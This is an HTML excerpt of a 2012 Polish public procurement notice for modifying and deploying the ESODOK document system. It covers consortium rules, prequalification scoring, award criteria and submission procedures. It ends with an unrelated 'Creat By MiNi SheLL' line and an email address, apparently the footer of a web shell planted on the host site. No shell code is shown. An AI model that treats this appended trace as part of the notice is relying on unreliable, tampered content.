Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 Pzp polega na zasobach innych podmiotów, na zasadach określonych w art. 26 ust. 2b Pzp, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów dotyczących  tego podmiotu w zakresie wymaganym dla wykonawcy w pkt. III 4.2. Postanowienia dotyczące podmiotów, które mają siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej stosuje się odpowiednio.<br>
INFORMACJA UZUPEŁNIAJĄCA: Jeżeli w kraju zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, których zamawiający żąda w odniesieniu do podmiotów zagranicznych, o których mowa w pkt. III.4.3.1, zastępuje się je dokumentem zawierającym oświadczenie złożone  przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawione z odpowiednią datą wymaganą dla tych dokumentów.<br>W przypadku wykonawców mających siedzibę lub miejsce zamieszkania  poza granicami kraju, zamawiający nie wymaga dostarczenia  dokumentów potwierdzających, iż wykonawca nie zalega z uiszczaniem  opłat, składek na ubezpieczenie społeczne i zdrowotne albo informacji, iż wykonawca  uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu w tym zakresie.<br>


W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z warunków określonych na podstawie art. 22 ustawy Pzp, winien spełniać co najmniej jeden z tych wykonawców albo wszyscy ci wykonawcy wspólnie. <br>
W przypadku oferty składanej przez wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, dokumenty potwierdzające, że wykonawca nie podlega wykluczeniu składa każdy z wykonawców oddzielnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Wartość punktowa przyznana wykonawcom za spełnienie, określonych przez zamawiającego, warunków dotyczących wiedzy i doświadczenia będzie wynikała z liczby przedstawionych w wykazie usług. Zamawiający przy prekwalifikacji wykonawców będzie brał pod uwagę  projekty lub usługi, które były realizowane przy bezpośrednim udziale wykonawcy, bądź w sytuacji powołania się na potencjał podmiotów trzecich na podstawie art. 26 ust. 2b,  będzie oceniał  projekty lub usługi tych podmiotów, które będą uczestniczyły w realizacji niniejszego zamówienia.  W takim przypadku wykonawca ma obowiązek wskazać  w jakim charakterze i zakresie  podmiot ten będzie uczestniczyć  w realizacji zamówienia będącego przedmiotem niniejszego postępowania.  Wykonawcy, którzy wykażą się realizacją usług na poziomie minimalnym, tj.
<br> 
1. jedno zamówienie polegające na opracowaniu i wdrożeniu lub modyfikacji i wdrożeniu systemu teleinformatycznego, którego elementem była implementacja procesów biznesowych, o wartości minimum 200 000 zł oraz <br>
2. jedna usługa wsparcia lub opieki dla systemu teleinformatycznego przez okres nie krótszy niż 24 miesiące o wartości średniej, w skali roku nie mniejszej niż 70 000 zł <br>
otrzymają 0 pkt.
<br>---<br>
Dopuszcza się, aby warunki sformułowane w punkcie 1, 2 zostały spełnione łącznie w ramach realizacji jednej umowy lub jednego zamówienia.
<br>---<br>
Dodatkowe punkty będą przyznane za realizację usług wykraczających ponad, określone przez zamawiającego, minimum - <br>
- 1 pkt w przypadku realizacji dodatkowo jednego projektu lub usługi (ponad minimalne wymaganie)<br>
- 2 pkt w przypadku realizacji dwóch projektów lub usług (ponad minimalne wymaganie), itd.<br>   
Jeżeli liczba wykonawców, którzy spełnią warunki udziału w postępowaniu, będzie większa niż określona w ogłoszeniu, zamawiający zaprosi do składania ofert wykonawców, którzy otrzymają najwyższe oceny spełniania tych warunków. Jeśli liczba wykonawców, którzy spełnią warunki udziału w postępowaniu, będzie mniejsza niż określona w ogłoszeniu zamawiający zaprosi do składania ofert wszystkich wykonawców, bez dokonania czynności ustalenia rankingu wykonawców.<br>
W przypadku otrzymania tej samej liczby punktów, przez więcej niż jednego wykonawcę, zamawiający przewiduje możliwość zaproszenia do udziału w postępowaniu więcej niż pięciu wykonawców.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 65</li>
<li>2 - ponowna instalacja systemu w środowisku zwirtualizowanym - 15</li>
<li>3 - dodatkowe 12 miesięcy gwarancji - 5</li>
<li>4 - dodatkowa ilość godzin opieki i wsparcia technicznego miesięcznie - 15</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający doprecyzuje dopuszczalne zmiany postanowień umowy w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uzp.gov.pl/cmsws/page/?D;1043<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia zostanie przekazana wykonawcom zaproszonym do drugiego etapu postępowania wraz z zaproszeniem do składania ofert..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2012 godzina 10:00, miejsce: Urząd Zamówień Publicznych<br>
ul. Postępu 17A<br>
02-676 Warszawa<br>
Kancelaria Urzędu- pok. 504<br>
godziny pracy kancelarii 7:30-17:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1) INFORMACJE O SPOSOBIE POROZUMIEWANIA SIĘ ZAMAWIAJĄCEGO Z WYKONAWCAMI ORAZ PRZEKAZYWANIU OŚWIADCZEŃ LUB DOKUMENTÓW, A TAKŻE WSKAZANIE OSÓB UPRAWNIONYCH DO POROZUMIEWANIA SIĘ Z WYKONAWCAMI:<br>
1. Niniejsze postępowanie jest prowadzone w języku polskim.<br>
2. W postępowaniu o udzielenie zamówienia oświadczenia, wnioski (inne niż wniosek o dopuszczenie do udziału w postępowaniu), zawiadomienia oraz informacje zamawiający i wykonawcy przekazują faksem, z zastrzeżeniem pkt 3.<br>
3. Forma pisemna zastrzeżona jest dla złożenia wniosku o dopuszczenie do udziału w postępowaniu  z załącznikami, w tym oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu oraz pełnomocnictwa.<br>
4. Korespondencję związaną z niniejszym postępowaniem, należy kierować na adres:<br>
Urząd Zamówień Publicznych<br>
ul. Postępu 17A<br>
02-676 Warszawa<br>
Fax: 22 458 77 00<br>
Z dopiskiem: Wniosek o dopuszczenie do udziału w postępowaniu - Modyfikacja, uaktualnienie, dostosowanie oraz uruchomienie produkcyjne ESODOK, wraz ze świadczeniem usług opieki i wsparcia technicznego.<br>
5. W sprawie procedury przetargowej należy porozumiewać się z p. Moniką Frączkowską, tel. 22 458-77-09, w godzinach: 9:00-15:00<br>
6. W sprawach związanych z przedmiotem zamówienia należy kontaktować się z p. Jackiem Szymańskim, tel. 22 458-77-87, w godzinach: 10:00-14:00<br>
2)SPOSÓB UZYSKANIA SPECYFIKACJI TECHNICZNEJ SYSTEMU ORAZ PREZENTACJA SYSTEMU:<br>
1. Wykonawcy, którzy zostaną zakwalifikowani do drugiego etapu postępowania mogą uzyskać dostęp do systemu oraz dokumentacji technicznej systemu, którego modyfikacja jest przedmiotem niniejszego postępowania. Udział w prezentacji funkcjonowania systemu będzie możliwy po złożeniu oświadczenia o poufności, w którym imiennie zostanie wskazana osoba lub osoby, które otrzymają wgląd do powyższych informacji.<br>
2. Wszelkie dokumentacje zostaną udostępnione wykonawcom w siedzibie Urzędu.<br>
3. Termin udostępnienia ww. zasobów zostanie wskazany przez zamawiającego. Czas udostępnienia zasobów jednemu wykonawcy nie przekroczy 3 dni roboczych.<br>
3)OPIS SPOSOBU PRZYGOTOWANIA WNIOSKÓW O DOPUSZCZENIE DO UDZIAŁU W POSTĘPOWANIU:<br>
1. Wniosek musi być sporządzony z zachowaniem formy pisemnej.<br>
2. Wniosek musi być podpisany przez osobę upoważnioną do reprezentowania wykonawcy. Pełnomocnictwo do podpisania wniosku (w oryginale lub kopii poświadczonej  notarialnie) musi być dołączone do wniosku, jeżeli nie wynika ono z innych dokumentów załączonych przez wykonawcę.<br>
3. Jeżeli osoba/osoby podpisująca wniosek działa na podstawie pełnomocnictwa, to  musi ono w swej treści jednoznacznie wskazywać uprawnienie do podpisania wniosku.<br>
4. Dokumenty są składane w oryginale lub kserokopii potwierdzonej za zgodność z oryginałem przez wykonawcę.<br>
5. Zaleca się, by każda zawierająca jakąkolwiek treść strona wniosku była podpisana lub parafowana przez wykonawcę. Każda poprawka w treści wniosku, a w szczególności każde przerobienie, przekreślenie, uzupełnienie, nadpisanie, przesłonięcie korektorem, etc powinny być parafowane przez wykonawcę.<br>
6. Zaleca się, aby strony wniosku wraz załącznikami były trwale ze sobą połączone.<br>
7. Wykonawca ponosi wszelkie koszty związane z przygotowaniem i złożeniem wniosku. <br>
8. Złożenie więcej niż jednego wniosku spowoduje odrzucenie wszystkich wniosków złożonych przez wykonawcę.<br>
------------------<br>
W celu ułatwienia złożenia wniosku o dopuszczenie do udziału w postępowaniu dokumenty pomocnicze można pobrać ze strony internetowej zamawiającego (http://www.uzp.gov.pl/cmsws/page/?D;1043).<br>
------------------<br>
Wskazany w  pkt 2 sekcji II niniejszego ogłoszenia  termin realizacji zamówienia obejmuje również 36 miesięczną usługę opieki i wsparcia technicznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com